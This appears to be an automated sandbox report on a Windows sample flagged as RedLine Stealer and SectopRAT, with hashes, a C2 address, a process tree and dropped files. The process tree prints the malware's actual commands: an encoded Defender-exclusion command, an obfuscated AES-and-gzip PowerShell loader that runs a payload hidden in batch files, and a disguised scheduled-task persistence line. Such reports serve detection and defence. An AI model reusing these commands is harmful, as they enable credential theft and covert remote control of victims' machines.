Analysis

  • max time kernel
    38s
  • max time network
    168s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 03:03

General

  • Target

    1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe

  • Size

    15.6MB

  • MD5

    ad3893ee2a8e40f2700236672635f5aa

  • SHA1

    80f3c0bc398c473e32eeb1420218be6a5feb291d

  • SHA256

    1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727

  • SHA512

    748db720695d028c034367f0af26d80ced9700dc497a82ce5a4ce578b39fb24c0f869ddbae3b542b15718523fa3cd29c11f78ded0f9f748ac4954256472a4111

  • SSDEEP

    196608:IZu1YQGj4ZSo3jXkpiliRElNhT7kiibJ488hEipzLmCKg4EFJ9UHytjAIgwX4FVE:+u1OjJEIZulNyHytjma0VvjZ6

Malware Config

Extracted

Family

redline

Botnet

cracked

C2

94.156.8.186:37552

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

Processes

  • C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
    "C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe"
    1⤵
      PID:4908
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AdABsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdQBpACMAPgA="
        2⤵
        • Command and Scripting Interpreter: PowerShell
        PID:2936
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xworm.bat" "
        2⤵
          PID:2236
          • C:\Users\Admin\AppData\Roaming\xworm.bat.exe
            "xworm.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xworm.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
            3⤵
              PID:4232
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xworm')
                4⤵
                  PID:1060
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_642_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_642.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:1556
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_642.vbs"
                  4⤵
                    PID:3976
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_642.bat" "
                      5⤵
                        PID:2084
                        • C:\Users\Admin\AppData\Roaming\startup_str_642.bat.exe
                          "startup_str_642.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_642.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
                          6⤵
                            PID:3000
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_642')
                              7⤵
                                PID:3540
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xfixer.bat" "
                      2⤵
                        PID:3136
                        • C:\Users\Admin\AppData\Roaming\xfixer.bat.exe
                          "xfixer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xfixer.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))
                          3⤵
                            PID:2864
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xfixer')
                              4⤵
                                PID:5072
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_642_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_642.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:5100
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_642.vbs"
                                4⤵
                                  PID:2528
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_642.bat" "
                                    5⤵
                                      PID:3272
                                      • C:\Users\Admin\AppData\Roaming\startup_str_642.bat.exe
                                        "startup_str_642.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_642.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
                                        6⤵
                                          PID:2716
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_642')
                                            7⤵
                                              PID:1704
                                  • C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe
                                    "C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"
                                    2⤵
                                      PID:1704
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3768 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
                                    1⤵
                                      PID:1076

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                      Filesize

                                      2KB

                                      MD5

                                      968cb9309758126772781b83adb8a28f

                                      SHA1

                                      8da30e71accf186b2ba11da1797cf67f8f78b47c

                                      SHA256

                                      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                      SHA512

                                      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\startup_str_642.bat.exe.log

                                      Filesize

                                      2KB

                                      MD5

                                      3c48a4f2d4cae1353f1f9f9ada80f550

                                      SHA1

                                      3fac319a3390c33a2e86cdcaf9dc8ee401348d5b

                                      SHA256

                                      640d4fc6827ed22d695f445f304357474cc57959a543c05eed43f501d0758c9f

                                      SHA512

                                      7d4b1d780b7375e89676477e8aef204417ec8b969fe29df148f2fa1a93ea51432964ef6f39c86ad69948842db7fb4c1ece33963031e920d41791f6a0c6685a16

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                      Filesize

                                      53KB

                                      MD5

                                      06ad34f9739c5159b4d92d702545bd49

                                      SHA1

                                      9152a0d4f153f3f40f7e606be75f81b582ee0c17

                                      SHA256

                                      474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

                                      SHA512

                                      c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      20KB

                                      MD5

                                      fcef6a9cf13b6e294ad1f86238d59537

                                      SHA1

                                      d94fcdb901dd27ef7aa456feaf92088debcd87c3

                                      SHA256

                                      d835c771671ba0b8ae3cf1c4e98037a721cb4864a6393e1df540260b61c5c8df

                                      SHA512

                                      29cff6ea5b072fdbc97d1d653656165be389df9be8141f735316e8a37bb5947c968a2ea00cbe19dd0695d21da5740b3f46e0069111ddacd17c0cd9e3379874ca

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      21KB

                                      MD5

                                      f6ad5e8971a26c9270d2362a484da580

                                      SHA1

                                      df96c6ea5e1c7b4d9683ecfef65394aa395c95f1

                                      SHA256

                                      50a2bc8fbd6a99af5c386d126018f39b6d714cd56b53e3afefb8e784a44d9d90

                                      SHA512

                                      3f8fc104e7c037aa749a80ca116de16a93d5f5ce0ee95b9449c4d655d656532d3aa2bccf8eaa7a46be135caae72179cc0e1443d29c64942dde3012af29fd8b57

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      17KB

                                      MD5

                                      34a9da1a70e68284d2893be74a394514

                                      SHA1

                                      d58f00aa9dec4ae177d887cc515f9793431bdc34

                                      SHA256

                                      35a7beb07404b3066aa5aedf59d7b3db63d818bb04cf6b56e5f6df897dd123ec

                                      SHA512

                                      a2b2c709026dfb19882d7b85dd2864824e783b4d7d7e5a1c4a0f5145a940513b9d1c418a6d8667c8b080f3318240da0afe3b1b6836f115c1b08cc8fc74809891

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      bbd38be647e50539ad6cb903b9eb73a5

                                      SHA1

                                      6a7156fabb92f996e47e5bb7ebd39d3a57f80d48

                                      SHA256

                                      d47eeeb624b09a01b1b1f974c4d507f76def4cfe4f891299c7c998a7f57c6b12

                                      SHA512

                                      2fff0f56af3500dac6c53abc4dda6d2d54d06be7c3c346109b063d527be3cda01a4bf37d3a7fd60bfe1d3d9156364df29844c09228742a17959f2fe68b2673be

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      21KB

                                      MD5

                                      d3c0b70badef9c73b525f58b91018fac

                                      SHA1

                                      6db9850474031be0fb40a0d89873acdc1ae6fdac

                                      SHA256

                                      9186cab6831b7018172668ab7bd291bdff9e79507a76d9c8a1935929761921f4

                                      SHA512

                                      813f3bb71a50a0b5ccf0ffb2c91d2422102074c7677c702e8c5645e83682b51ed36ac5dffa42fed4d5e81b8ed203bce87d39dcd81c99b5138ad6ecac3cfc75c2

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_muvisbgb.kzk.psm1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe

                                      Filesize

                                      2.0MB

                                      MD5

                                      99132975143a8320091f28d370183def

                                      SHA1

                                      0992efc9f7883343cfdfa1b893964e1d6bad6cb3

                                      SHA256

                                      7a3344a75423721530c88b53e4dba8fce6335e561d16272079922dca789dda26

                                      SHA512

                                      5ccb9bc85afb0a8b3f59979333786026e6de44087633a99b235d26a2e37fb0b87ed838418b7e08da540251aafde01b1fc174b5db9560defd4092298274baabff

                                    • C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe

                                      Filesize

                                      1.6MB

                                      MD5

                                      1a676a1a4afe1365b17c5862af4064b0

                                      SHA1

                                      a28f15f774fc7e63f01207bee94e472040c2e778

                                      SHA256

                                      bc7c74afce2d948add9f00016ed9ba4d0f22dfe261e15d6429806072fc124dd9

                                      SHA512

                                      3f3276894fe2482852e9e85fd02b8e03d7fae4369e9065f3edfa680f2e52704a8a30296d703c35047a45a7f011cb2835df2946bf2c3620c1d2cc46150eef5e0d

                                    • C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe

                                      Filesize

                                      1.8MB

                                      MD5

                                      5edd09536577f153f01f6cc3e2a7c80c

                                      SHA1

                                      bbe9c0e8cf1cecc792d8d166aa2f06961f1498a1

                                      SHA256

                                      2a7432df968e1c3942d6c6cca1ebfdcccec60eb3dbc599f90f59bf21ecf4c8fc

                                      SHA512

                                      2c581f9f58dcd5d7e13257aced057fa3956188e1743fe5e91d121ef80a187b52b818efba40f4bf9e6b2dc222289237f576e81775f3874140c41c70510b9f0cf7

                                    • C:\Users\Admin\AppData\Roaming\startup_str_642.vbs

                                      Filesize

                                      115B

                                      MD5

                                      651e268bafb4b7df105ed5f36517dfd2

                                      SHA1

                                      554788104a08a9aa3a7ef0a7ec510ec6bdc56ac0

                                      SHA256

                                      c182994577c5c2bcc3e0707cfd9be191b8651ad1c624b288f0f26ca2e9c626d2

                                      SHA512

                                      f347e8e824ff689acac44313f045cd4282f5adfce2765c8cbd6d9e335ab1e0a5464d50bcb2fb37ef491e6e78ec482aebc6c372f15b69b104148451518c7dd43c

                                    • C:\Users\Admin\AppData\Roaming\xfixer.bat

                                      Filesize

                                      304KB

                                      MD5

                                      28a668375e0d2b1cfa1d847fc44934d4

                                      SHA1

                                      bd0d7df2f07f879e97e02d13d9eebf0a584fabe7

                                      SHA256

                                      cc3de81425f13eba2412c152f843351307b3d7f3cb9bd2da3d577ec5e36f8160

                                      SHA512

                                      d35dd9fd930f84f5cf1b042c828b6d2adc3007ff0042153f5f7fd45f8539f4155df8b07f59fe488ab3a03f2af4f8067b56c7276b3c80d3554d02ed930470689c

                                    • C:\Users\Admin\AppData\Roaming\xfixer.bat.exe

                                      Filesize

                                      423KB

                                      MD5

                                      c32ca4acfcc635ec1ea6ed8a34df5fac

                                      SHA1

                                      f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

                                      SHA256

                                      73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

                                      SHA512

                                      6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

                                    • C:\Users\Admin\AppData\Roaming\xworm.bat

                                      Filesize

                                      317KB

                                      MD5

                                      ada0b01d33911547bb0086e0ed152484

                                      SHA1

                                      ec81374c631f94c536b51dfb8c42c063bf72ca78

                                      SHA256

                                      aba89066a3bbc1addaaa48b4d209dac1e59138afb64c797bf950d286e8e826a1

                                      SHA512

                                      6aba80c863169fe3a244e20c6d9cfc13f8f69ff81a8402327603f46700a2798d19d1347f0c34e9301cac9aeec0ae5ae9adc76f571dddb9fdbfac6c23de3aae26

                                    • memory/1060-114-0x0000000074940000-0x000000007498C000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/1556-177-0x0000000007020000-0x0000000007031000-memory.dmp

                                      Filesize

                                      68KB

                                    • memory/1556-156-0x0000000074940000-0x000000007498C000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/1556-166-0x0000000006CD0000-0x0000000006D73000-memory.dmp

                                      Filesize

                                      652KB

                                    • memory/1704-27-0x000001FFCA860000-0x000001FFCB748000-memory.dmp

                                      Filesize

                                      14.9MB

                                    • memory/1704-250-0x00000000758C0000-0x000000007590C000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/2716-266-0x0000000007ED0000-0x0000000007EE2000-memory.dmp

                                      Filesize

                                      72KB

                                    • memory/2716-265-0x0000000008D10000-0x0000000009328000-memory.dmp

                                      Filesize

                                      6.1MB

                                    • memory/2716-269-0x0000000009330000-0x00000000094F2000-memory.dmp

                                      Filesize

                                      1.8MB

                                    • memory/2864-79-0x00000000072A0000-0x00000000074F2000-memory.dmp

                                      Filesize

                                      2.3MB

                                    • memory/2864-65-0x0000000007820000-0x0000000007E9A000-memory.dmp

                                      Filesize

                                      6.5MB

                                    • memory/2864-60-0x0000000005B20000-0x0000000005E74000-memory.dmp

                                      Filesize

                                      3.3MB

                                    • memory/2864-29-0x00000000051C0000-0x00000000057E8000-memory.dmp

                                      Filesize

                                      6.2MB

                                    • memory/2864-28-0x0000000004B50000-0x0000000004B86000-memory.dmp

                                      Filesize

                                      216KB

                                    • memory/2936-62-0x0000000005CB0000-0x0000000005CFC000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/2936-63-0x0000000006190000-0x00000000061C2000-memory.dmp

                                      Filesize

                                      200KB

                                    • memory/2936-126-0x0000000007180000-0x0000000007188000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/2936-117-0x0000000007150000-0x0000000007164000-memory.dmp

                                      Filesize

                                      80KB

                                    • memory/2936-30-0x0000000004CF0000-0x0000000004D12000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/2936-103-0x0000000007140000-0x000000000714E000-memory.dmp

                                      Filesize

                                      56KB

                                    • memory/2936-102-0x0000000007100000-0x0000000007111000-memory.dmp

                                      Filesize

                                      68KB

                                    • memory/2936-83-0x0000000007190000-0x0000000007226000-memory.dmp

                                      Filesize

                                      600KB

                                    • memory/2936-82-0x0000000006F70000-0x0000000006F7A000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/2936-31-0x0000000005550000-0x00000000055B6000-memory.dmp

                                      Filesize

                                      408KB

                                    • memory/2936-125-0x0000000007230000-0x000000000724A000-memory.dmp

                                      Filesize

                                      104KB

                                    • memory/2936-77-0x0000000006C50000-0x0000000006CF3000-memory.dmp

                                      Filesize

                                      652KB

                                    • memory/2936-64-0x0000000074940000-0x000000007498C000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/2936-75-0x0000000006170000-0x000000000618E000-memory.dmp

                                      Filesize

                                      120KB

                                    • memory/3000-267-0x0000000007830000-0x000000000786C000-memory.dmp

                                      Filesize

                                      240KB

                                    • memory/3000-219-0x0000000006580000-0x00000000065CC000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/3000-264-0x00000000050E0000-0x00000000050FE000-memory.dmp

                                      Filesize

                                      120KB

                                    • memory/3000-270-0x0000000009290000-0x00000000097BC000-memory.dmp

                                      Filesize

                                      5.2MB

                                    • memory/3000-268-0x0000000008120000-0x000000000822A000-memory.dmp

                                      Filesize

                                      1.0MB

                                    • memory/3540-260-0x00000000074B0000-0x00000000074C1000-memory.dmp

                                      Filesize

                                      68KB

                                    • memory/3540-240-0x00000000758C0000-0x000000007590C000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/4232-61-0x00000000067A0000-0x00000000067BE000-memory.dmp

                                      Filesize

                                      120KB

                                    • memory/4232-78-0x0000000007A30000-0x0000000007C84000-memory.dmp

                                      Filesize

                                      2.3MB

                                    • memory/4232-32-0x0000000006240000-0x00000000062A6000-memory.dmp

                                      Filesize

                                      408KB

                                    • memory/4232-76-0x0000000006D40000-0x0000000006D5A000-memory.dmp

                                      Filesize

                                      104KB

                                    • memory/5072-104-0x0000000074940000-0x000000007498C000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/5100-167-0x0000000074940000-0x000000007498C000-memory.dmp

                                      Filesize

                                      304KB